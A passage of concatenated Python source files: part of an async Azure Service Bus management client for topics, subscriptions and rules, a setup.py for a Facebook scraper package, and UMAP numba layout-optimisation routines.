:type requires_duplicate_detection: bool
:keyword duplicate_detection_history_time_window: ISO 8601 timeSpan structure that defines the
duration of the duplicate detection history. The default value is 10 minutes.
:type duplicate_detection_history_time_window: ~datetime.timedelta
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword size_in_bytes: The size of the topic, in bytes.
:type size_in_bytes: int
:keyword filtering_messages_before_publishing: Filter messages before publishing.
:type filtering_messages_before_publishing: bool
:keyword authorization_rules: Authorization rules for resource.
:type authorization_rules:
list[~azure.servicebus.management.AuthorizationRule]
:keyword support_ordering: A value that indicates whether the topic supports ordering.
:type support_ordering: bool
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the topic is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:keyword enable_partitioning: A value that indicates whether the topic is to be partitioned
across multiple message brokers.
:type enable_partitioning: bool
:keyword enable_express: A value that indicates whether Express Entities are enabled. An express
queue holds a message in memory temporarily before writing it to persistent storage.
:type enable_express: bool
:keyword user_metadata: Metadata associated with the topic.
:type user_metadata: str
:rtype: ~azure.servicebus.management.TopicProperties
"""
topic = TopicProperties(
name,
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
max_size_in_megabytes=kwargs.pop("max_size_in_megabytes", None),
requires_duplicate_detection=kwargs.pop("requires_duplicate_detection", None),
duplicate_detection_history_time_window=kwargs.pop("duplicate_detection_history_time_window", None),
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
size_in_bytes=kwargs.pop("size_in_bytes", None),
authorization_rules=kwargs.pop("authorization_rules", None),
status=kwargs.pop("status", None),
support_ordering=kwargs.pop("support_ordering", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
enable_partitioning=kwargs.pop("enable_partitioning", None),
availability_status=None,
enable_express=kwargs.pop("enable_express", None),
user_metadata=kwargs.pop("user_metadata", None)
)
to_create = topic._to_internal_entity()
create_entity_body = CreateTopicBody(
content=CreateTopicBodyContent(
topic_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.entity.put(
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
entry = TopicDescriptionEntry.deserialize(entry_ele)
result = TopicProperties._from_internal_entity(name, entry.content.topic_description)
return result
async def update_topic(self, topic: TopicProperties, **kwargs) -> None:
"""Update a topic.
Before calling this method, you should use `get_topic`, `create_topic` or `list_topics` to get a
`TopicProperties` instance, then update the properties. Only a portion of properties can be updated.
Refer to https://docs.microsoft.com/en-us/rest/api/servicebus/update-topic.
:param topic: The topic that is returned from `get_topic`, `create_topic`, or `list_topics`
and has the updated properties.
:type topic: ~azure.servicebus.management.TopicProperties
:rtype: None
"""
to_update = topic._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateTopicBody(
content=CreateTopicBodyContent(
topic_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.entity.put(
topic.name, # type: ignore
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_topic(self, topic: Union[str, TopicProperties], **kwargs) -> None:
"""Delete a topic.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic to be deleted.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
await self._impl.entity.delete(topic_name, api_version=constants.API_VERSION, **kwargs)
def list_topics(self, **kwargs: Any) -> AsyncItemPaged[TopicProperties]:
"""List the topics of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of TopicProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.TopicProperties]
"""
def entry_to_topic(entry):
topic = TopicProperties._from_internal_entity(entry.title, entry.content.topic_description)
return topic
extract_data = functools.partial(
extract_data_template, TopicDescriptionFeed, entry_to_topic
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_TOPICS), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_topics_runtime_properties(self, **kwargs: Any) -> AsyncItemPaged[TopicRuntimeProperties]:
"""List the topics runtime information of a ServiceBus namespace.
:returns: An iterable (auto-paging) response of TopicRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.TopicRuntimeProperties]
"""
def entry_to_topic(entry):
topic = TopicRuntimeProperties._from_internal_entity(entry.title, entry.content.topic_description)
return topic
extract_data = functools.partial(
extract_data_template, TopicDescriptionFeed, entry_to_topic
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_entities, constants.ENTITY_TYPE_TOPICS), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_subscription(
self, topic: Union[str, TopicProperties], subscription_name: str, **kwargs
) -> SubscriptionProperties:
"""Get the properties of a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param str subscription_name: name of the subscription.
:rtype: ~azure.servicebus.management.SubscriptionProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
entry_ele = await self._get_subscription_element(topic_name, subscription_name, **kwargs)
entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Subscription('Topic: {}, Subscription: {}') does not exist".format(subscription_name, topic_name))
subscription = SubscriptionProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
async def get_subscription_runtime_properties(
self, topic: Union[str, TopicProperties], subscription_name: str, **kwargs
) -> SubscriptionRuntimeProperties:
"""Get a topic subscription runtime info.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param str subscription_name: name of the subscription.
:rtype: ~azure.servicebus.management.SubscriptionRuntimeProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
entry_ele = await self._get_subscription_element(topic_name, subscription_name, **kwargs)
entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Subscription('Topic: {}, Subscription: {}') does not exist".format(subscription_name, topic_name))
subscription = SubscriptionRuntimeProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
async def create_subscription(
self, topic: Union[str, TopicProperties], name: str, **kwargs
) -> SubscriptionProperties:
"""Create a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that will own the
to-be-created subscription.
:param name: Name of the subscription.
:type name: str
:keyword lock_duration: ISO 8601 timespan duration of a peek-lock; that is, the amount of time
that the message is locked for other receivers. The maximum value for LockDuration is 5
minutes; the default value is 1 minute.
:type lock_duration: ~datetime.timedelta
:keyword requires_session: A value that indicates whether the queue supports the concept of
sessions.
:type requires_session: bool
:keyword default_message_time_to_live: ISO 8601 default message timespan to live value. This is
the duration after which the message expires, starting from when the message is sent to Service
Bus. This is the default value used when TimeToLive is not set on a message itself.
:type default_message_time_to_live: ~datetime.timedelta
:keyword dead_lettering_on_message_expiration: A value that indicates whether this subscription
has dead letter support when a message expires.
:type dead_lettering_on_message_expiration: bool
:keyword dead_lettering_on_filter_evaluation_exceptions: A value that indicates whether this
subscription has dead letter support when a message expires.
:type dead_lettering_on_filter_evaluation_exceptions: bool
:keyword max_delivery_count: The maximum delivery count. A message is automatically deadlettered
after this number of deliveries. Default value is 10.
:type max_delivery_count: int
:keyword enable_batched_operations: Value that indicates whether server-side batched operations
are enabled.
:type enable_batched_operations: bool
:keyword forward_to: The name of the recipient entity to which all the messages sent to the
subscription are forwarded to.
:type forward_to: str
:keyword user_metadata: Metadata associated with the subscription. Maximum number of characters
is 1024.
:type user_metadata: str
:keyword forward_dead_lettered_messages_to: The name of the recipient entity to which all the
messages sent to the subscription are forwarded to.
:type forward_dead_lettered_messages_to: str
:keyword auto_delete_on_idle: ISO 8601 timeSpan idle interval after which the subscription is
automatically deleted. The minimum duration is 5 minutes.
:type auto_delete_on_idle: ~datetime.timedelta
:rtype: ~azure.servicebus.management.SubscriptionProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
subscription = SubscriptionProperties(
name,
lock_duration=kwargs.pop("lock_duration", None),
requires_session=kwargs.pop("requires_session", None),
default_message_time_to_live=kwargs.pop("default_message_time_to_live", None),
dead_lettering_on_message_expiration=kwargs.pop("dead_lettering_on_message_expiration", None),
dead_lettering_on_filter_evaluation_exceptions=
kwargs.pop("dead_lettering_on_filter_evaluation_exceptions", None),
max_delivery_count=kwargs.pop("max_delivery_count", None),
enable_batched_operations=kwargs.pop("enable_batched_operations", None),
status=kwargs.pop("status", None),
forward_to=kwargs.pop("forward_to", None),
user_metadata=kwargs.pop("user_metadata", None),
forward_dead_lettered_messages_to=kwargs.pop("forward_dead_lettered_messages_to", None),
auto_delete_on_idle=kwargs.pop("auto_delete_on_idle", None),
availability_status=None,
)
to_create = subscription._to_internal_entity() # type: ignore # pylint:disable=protected-access
create_entity_body = CreateSubscriptionBody(
content=CreateSubscriptionBodyContent(
subscription_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
entry_ele = cast(
ElementTree,
await self._impl.subscription.put(
topic_name,
name, # type: ignore
request_body, api_version=constants.API_VERSION, **kwargs)
)
entry = SubscriptionDescriptionEntry.deserialize(entry_ele)
result = SubscriptionProperties._from_internal_entity(
name, entry.content.subscription_description)
return result
async def update_subscription(
self, topic: Union[str, TopicProperties], subscription: SubscriptionProperties, **kwargs
) -> None:
"""Update a subscription.
Before calling this method, you should use `get_subscription`, `update_subscription` or `list_subscription`
to get a `SubscriptionProperties` instance, then update the properties.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param ~azure.servicebus.management.SubscriptionProperties subscription: The subscription that is returned
from `get_subscription`, `update_subscription` or `list_subscription` and has the updated properties.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
to_update = subscription._to_internal_entity()
to_update.default_message_time_to_live = avoid_timedelta_overflow(to_update.default_message_time_to_live)
to_update.auto_delete_on_idle = avoid_timedelta_overflow(to_update.auto_delete_on_idle)
create_entity_body = CreateSubscriptionBody(
content=CreateSubscriptionBodyContent(
subscription_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
with _handle_response_error():
await self._impl.subscription.put(
topic_name,
subscription.name,
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_subscription(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties], **kwargs
) -> None:
"""Delete a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription
to be deleted.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
await self._impl.subscription.delete(topic_name, subscription_name, api_version=constants.API_VERSION, **kwargs)
def list_subscriptions(
self, topic: Union[str, TopicProperties], **kwargs: Any) -> AsyncItemPaged[SubscriptionProperties]:
"""List the subscriptions of a ServiceBus Topic.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:returns: An iterable (auto-paging) response of SubscriptionProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.SubscriptionProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
def entry_to_subscription(entry):
subscription = SubscriptionProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
extract_data = functools.partial(
extract_data_template, SubscriptionDescriptionFeed, entry_to_subscription
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_subscriptions, topic_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
def list_subscriptions_runtime_properties(
self, topic: Union[str, TopicProperties], **kwargs: Any) -> AsyncItemPaged[SubscriptionRuntimeProperties]:
"""List the subscriptions runtime information of a ServiceBus.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:returns: An iterable (auto-paging) response of SubscriptionRuntimeProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.SubscriptionRuntimeProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
def entry_to_subscription(entry):
subscription = SubscriptionRuntimeProperties._from_internal_entity(
entry.title, entry.content.subscription_description)
return subscription
extract_data = functools.partial(
extract_data_template, SubscriptionDescriptionFeed, entry_to_subscription
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_subscriptions, topic_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule_name: str, **kwargs) -> RuleProperties:
"""Get the properties of a topic subscription rule.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the rule.
:param str rule_name: Name of the rule.
:rtype: ~azure.servicebus.management.RuleProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
entry_ele = await self._get_rule_element(topic_name, subscription_name, rule_name, **kwargs)
entry = RuleDescriptionEntry.deserialize(entry_ele)
if not entry.content:
raise ResourceNotFoundError(
"Rule('Topic: {}, Subscription: {}, Rule {}') does not exist".format(
subscription_name, topic_name, rule_name))
rule_description = RuleProperties._from_internal_entity(rule_name, entry.content.rule_description)
deserialize_rule_key_values(entry_ele, rule_description) # to remove after #3535 is released.
return rule_description
async def create_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
name: str, **kwargs) -> RuleProperties:
"""Create a rule for a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that will own the
to-be-created subscription rule.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
will own the to-be-created rule.
:param name: Name of the rule.
:type name: str
:keyword filter: The filter of the rule.
:type filter: Union[~azure.servicebus.management.CorrelationRuleFilter,
~azure.servicebus.management.SqlRuleFilter]
:keyword action: The action of the rule.
:type action: Optional[~azure.servicebus.management.SqlRuleAction]
:rtype: ~azure.servicebus.management.RuleProperties
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
rule = RuleProperties(
name,
filter=kwargs.pop("filter", None),
action=kwargs.pop("action", None),
created_at_utc=None
)
to_create = rule._to_internal_entity()
create_entity_body = CreateRuleBody(
content=CreateRuleBodyContent(
rule_description=to_create, # type: ignore
)
)
request_body = create_entity_body.serialize(is_xml=True)
serialize_rule_key_values(request_body, rule)
with _handle_response_error():
entry_ele = await self._impl.rule.put(
topic_name,
subscription_name, # type: ignore
name,
request_body, api_version=constants.API_VERSION, **kwargs)
entry = RuleDescriptionEntry.deserialize(entry_ele)
result = RuleProperties._from_internal_entity(name, entry.content.rule_description)
deserialize_rule_key_values(entry_ele, result) # to remove after #3535 is released.
return result
async def update_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule: RuleProperties, **kwargs) -> None:
"""Update a rule.
Before calling this method, you should use `get_rule`, `create_rule` or `list_rules` to get a `RuleProperties`
instance, then update the properties.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns this rule.
:param ~azure.servicebus.management.RuleProperties rule: The rule that is returned from `get_rule`,
`create_rule`, or `list_rules` and has the updated properties.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
to_update = rule._to_internal_entity()
create_entity_body = CreateRuleBody(
content=CreateRuleBodyContent(
rule_description=to_update,
)
)
request_body = create_entity_body.serialize(is_xml=True)
serialize_rule_key_values(request_body, rule)
with _handle_response_error():
await self._impl.rule.put(
topic_name,
subscription_name,
rule.name,
request_body,
api_version=constants.API_VERSION,
if_match="*",
**kwargs
)
async def delete_rule(
self, topic: Union[str, TopicProperties], subscription: Union[str, SubscriptionProperties],
rule: Union[str, RuleProperties], **kwargs) -> None:
"""Delete a topic subscription rule.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the topic.
:param Union[str, ~azure.servicebus.management.RuleProperties] rule: The to-be-deleted rule.
:rtype: None
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
try:
rule_name = rule.name # type: ignore
except AttributeError:
rule_name = rule
await self._impl.rule.delete(
topic_name, subscription_name, rule_name, api_version=constants.API_VERSION, **kwargs)
def list_rules(
self,
topic: Union[str, TopicProperties],
subscription: Union[str, SubscriptionProperties],
**kwargs: Any
) -> AsyncItemPaged[RuleProperties]:
"""List the rules of a topic subscription.
:param Union[str, ~azure.servicebus.management.TopicProperties] topic: The topic that owns the subscription.
:param Union[str, ~azure.servicebus.management.SubscriptionProperties] subscription: The subscription that
owns the rules.
:returns: An iterable (auto-paging) response of RuleProperties.
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.servicebus.management.RuleProperties]
"""
try:
topic_name = topic.name # type: ignore
except AttributeError:
topic_name = topic
try:
subscription_name = subscription.name # type: ignore
except AttributeError:
subscription_name = subscription
def entry_to_rule(ele, entry):
"""
`ele` will be removed after #3535 is released.
"""
rule = entry.content.rule_description
rule_description = RuleProperties._from_internal_entity(entry.title, rule)
deserialize_rule_key_values(ele, rule_description) # to remove after #3535 is released.
return rule_description
extract_data = functools.partial(
extract_rule_data_template, RuleDescriptionFeed, entry_to_rule
)
get_next = functools.partial(
get_next_template, functools.partial(self._impl.list_rules, topic_name, subscription_name), **kwargs
)
return AsyncItemPaged(
get_next, extract_data)
async def get_namespace_properties(self, **kwargs) -> NamespaceProperties:
"""Get the namespace properties
:rtype: ~azure.servicebus.management.NamespaceProperties
"""
entry_el = await self._impl.namespace.get(api_version=constants.API_VERSION, **kwargs)
namespace_entry = NamespacePropertiesEntry.deserialize(entry_el)
return NamespaceProperties._from_internal_entity(namespace_entry.title,
namespace_entry.content.namespace_properties)
async def close(self) -> None:
await self._impl.close()
|
from setuptools import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(
name='meta-scraper',
version='0.0.1',
description='Facebook (Meta) Scraper',
long_description=readme(),
classifiers = ['Programming Language :: Python',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Intended Audience :: Developers',
'Topic :: Utilities',
],
keywords='facebook meta pages reviews api sdk scraper parser extractor',
url='https://github.com/meta-scraper/facebook-scraper-python',
author='meta-scraper',
author_email='michael63s@protonmail.com',
license='MIT',
packages=['meta_scraper'],
install_requires=['requests'],
include_package_data=True,
zip_safe=False,
long_description_content_type='text/x-rst',
)
|
import numpy as np
import numba
import umap.distances as dist
from umap.utils import tau_rand_int
@numba.njit()
def clip(val):
"""Standard clamping of a value into a fixed range (in this case -4.0 to
4.0)
Parameters
----------
val: float
The value to be clamped.
Returns
-------
The clamped value, now fixed to be in the range -4.0 to 4.0.
"""
if val > 4.0:
return 4.0
elif val < -4.0:
return -4.0
else:
return val
@numba.njit(
"f4(f4[::1],f4[::1])",
fastmath=True,
cache=True,
locals={
"result": numba.types.float32,
"diff": numba.types.float32,
"dim": numba.types.int32,
},
)
def rdist(x, y):
"""Reduced Euclidean distance.
Parameters
----------
x: array of shape (embedding_dim,)
y: array of shape (embedding_dim,)
Returns
-------
The squared euclidean distance between x and y
"""
result = 0.0
dim = x.shape[0]
for i in range(dim):
diff = x[i] - y[i]
result += diff * diff
return result
def _optimize_layout_euclidean_single_epoch(
head_embedding,
tail_embedding,
head,
tail,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma,
dim,
move_other,
alpha,
epochs_per_negative_sample,
epoch_of_next_negative_sample,
epoch_of_next_sample,
n,
):
for i in numba.prange(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_squared = rdist(current, other)
if dist_squared > 0.0:
grad_coeff = -2.0 * a * b * pow(dist_squared, b - 1.0)
grad_coeff /= a * pow(dist_squared, b) + 1.0
else:
grad_coeff = 0.0
for d in range(dim):
grad_d = clip(grad_coeff * (current[d] - other[d]))
current[d] += grad_d * alpha
if move_other:
other[d] += -grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i]) / epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_squared = rdist(current, other)
if dist_squared > 0.0:
grad_coeff = 2.0 * gamma * b
grad_coeff /= (0.001 + dist_squared) * (
a * pow(dist_squared, b) + 1
)
elif j == k:
continue
else:
grad_coeff = 0.0
for d in range(dim):
if grad_coeff > 0.0:
grad_d = clip(grad_coeff * (current[d] - other[d]))
else:
grad_d = 4.0
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
def optimize_layout_euclidean(
head_embedding,
tail_embedding,
head,
tail,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
parallel=False,
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_samples: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
parallel: bool (optional, default False)
Whether to run the computation using numba parallel.
Running in parallel is non-deterministic, and is not used
if a random seed has been set, to ensure reproducibility.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
optimize_fn = numba.njit(
_optimize_layout_euclidean_single_epoch, fastmath=True, parallel=parallel
)
for n in range(n_epochs):
optimize_fn(
head_embedding,
tail_embedding,
head,
tail,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma,
dim,
move_other,
alpha,
epochs_per_negative_sample,
epoch_of_next_negative_sample,
epoch_of_next_sample,
n,
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % int(n_epochs / 10) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
@numba.njit(fastmath=True)
def optimize_layout_generic(
head_embedding,
tail_embedding,
head,
tail,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
output_metric=dist.euclidean,
output_metric_kwds=(),
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
weight: array of shape (n_1_simplices)
The membership weights of the 1-simplices.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_sample: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
epochs_per_negative_sample = epochs_per_sample / negative_sample_rate
epoch_of_next_negative_sample = epochs_per_negative_sample.copy()
epoch_of_next_sample = epochs_per_sample.copy()
for n in range(n_epochs):
for i in range(epochs_per_sample.shape[0]):
if epoch_of_next_sample[i] <= n:
j = head[i]
k = tail[i]
current = head_embedding[j]
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
_, rev_grad_dist_output = output_metric(
other, current, *output_metric_kwds
)
if dist_output > 0.0:
w_l = pow((1 + a * pow(dist_output, 2 * b)), -1)
else:
w_l = 1.0
grad_coeff = 2 * b * (w_l - 1) / (dist_output + 1e-6)
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
if move_other:
grad_d = clip(grad_coeff * rev_grad_dist_output[d])
other[d] += grad_d * alpha
epoch_of_next_sample[i] += epochs_per_sample[i]
n_neg_samples = int(
(n - epoch_of_next_negative_sample[i])
/ epochs_per_negative_sample[i]
)
for p in range(n_neg_samples):
k = tau_rand_int(rng_state) % n_vertices
other = tail_embedding[k]
dist_output, grad_dist_output = output_metric(
current, other, *output_metric_kwds
)
if dist_output > 0.0:
w_l = pow((1 + a * pow(dist_output, 2 * b)), -1)
elif j == k:
continue
else:
w_l = 1.0
grad_coeff = gamma * 2 * b * w_l / (dist_output + 1e-6)
for d in range(dim):
grad_d = clip(grad_coeff * grad_dist_output[d])
current[d] += grad_d * alpha
epoch_of_next_negative_sample[i] += (
n_neg_samples * epochs_per_negative_sample[i]
)
alpha = initial_alpha * (1.0 - (float(n) / float(n_epochs)))
if verbose and n % int(n_epochs / 10) == 0:
print("\tcompleted ", n, " / ", n_epochs, "epochs")
return head_embedding
@numba.njit(fastmath=True)
def optimize_layout_inverse(
head_embedding,
tail_embedding,
head,
tail,
weight,
sigmas,
rhos,
n_epochs,
n_vertices,
epochs_per_sample,
a,
b,
rng_state,
gamma=1.0,
initial_alpha=1.0,
negative_sample_rate=5.0,
output_metric=dist.euclidean,
output_metric_kwds=(),
verbose=False,
):
"""Improve an embedding using stochastic gradient descent to minimize the
fuzzy set cross entropy between the 1-skeletons of the high dimensional
and low dimensional fuzzy simplicial sets. In practice this is done by
sampling edges based on their membership strength (with the (1-p) terms
coming from negative sampling similar to word2vec).
Parameters
----------
head_embedding: array of shape (n_samples, n_components)
The initial embedding to be improved by SGD.
tail_embedding: array of shape (source_samples, n_components)
The reference embedding of embedded points. If not embedding new
previously unseen points with respect to an existing embedding this
is simply the head_embedding (again); otherwise it provides the
existing embedding to embed with respect to.
head: array of shape (n_1_simplices)
The indices of the heads of 1-simplices with non-zero membership.
tail: array of shape (n_1_simplices)
The indices of the tails of 1-simplices with non-zero membership.
weight: array of shape (n_1_simplices)
The membership weights of the 1-simplices.
n_epochs: int
The number of training epochs to use in optimization.
n_vertices: int
The number of vertices (0-simplices) in the dataset.
epochs_per_sample: array of shape (n_1_simplices)
A float value of the number of epochs per 1-simplex. 1-simplices with
weaker membership strength will have more epochs between being sampled.
a: float
Parameter of differentiable approximation of right adjoint functor
b: float
Parameter of differentiable approximation of right adjoint functor
rng_state: array of int64, shape (3,)
The internal state of the rng
gamma: float (optional, default 1.0)
Weight to apply to negative samples.
initial_alpha: float (optional, default 1.0)
Initial learning rate for the SGD.
negative_sample_rate: int (optional, default 5)
Number of negative samples to use per positive sample.
verbose: bool (optional, default False)
Whether to report information on the current progress of the algorithm.
Returns
-------
embedding: array of shape (n_samples, n_components)
The optimized embedding.
"""
dim = head_embedding.shape[1]
move_other = head_embedding.shape[0] == tail_embedding.shape[0]
alpha = initial_alpha
